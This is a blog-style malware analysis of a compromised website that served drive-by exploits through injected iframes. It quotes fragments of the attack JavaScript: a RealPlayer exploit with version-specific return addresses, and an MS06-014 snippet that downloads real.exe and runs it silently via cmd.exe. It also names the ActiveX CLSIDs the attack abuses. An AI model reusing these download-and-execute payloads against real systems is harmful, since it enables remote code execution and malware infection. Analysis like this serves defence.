[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

Hi,

A new virus similar to 31joy.com/rb.vg attacked some WebSites (one in particular {CENSORED}.biz), it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this WebSite, are firstly Exploited (if poorly harmored) and successively infected by Adware and Spyware.

I’ve analysed the WebSite, with Malzilla, infection is a classical one, inserts malicious code at the top of pages, so when a Victim visits the site 4 Infected Iframes are loaded, and some ‘.js‘ and ‘.cab‘ are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm
http://{CENSORED}.php?id{CENSORED}we{CENSORED}=pic1

Let’s analyse the First IFrame, a .js is loaded:function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf(“msie 6”)==-1&&user.indexOf(“msie 7”)==-1)

[…]

else if(RealVersion == “6.0.14.544”)
ret = unescape(“%63%11%08%60”);
else if(RealVersion == “6.0.14.550”)
ret = unescape(“%63%11%04%60”);
else if(RealVersion == “6.0.14.552”)
ret = unescape(“%79%31%01%60”);
else if(RealVersion == “6.0.14.543”)
ret = unescape(“%79%31%09%60”);
else if(RealVersion == “6.0.14.536”)
ret = unescape(“%51%11%70%63”);

[…]

}

It’s clear that the first IFrame launches the famous RealTime Exploit that allows Remote Code Execution.

Second IFrame, 2.htm conducts to another JavaScript:

function init()
{

var ado=(document.createElement(“object”));
ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36“);

This CLSID is suspicious let’s search about it, its another common Exploit: RDS.DataStore – Data Execution (CVS-2006-0003 / MS06-14), the IFrame itself loads others Objects:
0614.js
MPS.js
PowerPlayerCtrl.js

4.CAB -> that contains bd.exe OR r.exe and is Worm/Cekar.A

Let’s see the first 0614.js :

var url=”http://{CENSORED}/real.exe”;
[…]
xml.Open(“GET”,url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path=”..\\ntuser.com”;
as.savetofile(path,2);
as.close();
var shell=ado.createobject(“Shell.Application”,””);
shell.ShellExecute(“cmd.exe”,”/c ” + path,””,”open”,0)}
[…]
The previous Data Execution exploit, calls this JavaScript that downloads and executes real.exe, that is obviously a Virus, Win32.Worm.Cekar..

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third IFrame xl.htm

Calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F which is another exploit that attempts to exploit a buffer overflow vulnerability in Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control, this leads to another Remote Code Execution.

–> Last IFrame, seems to be only a counter

See you to the next post!šŸ™‚

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: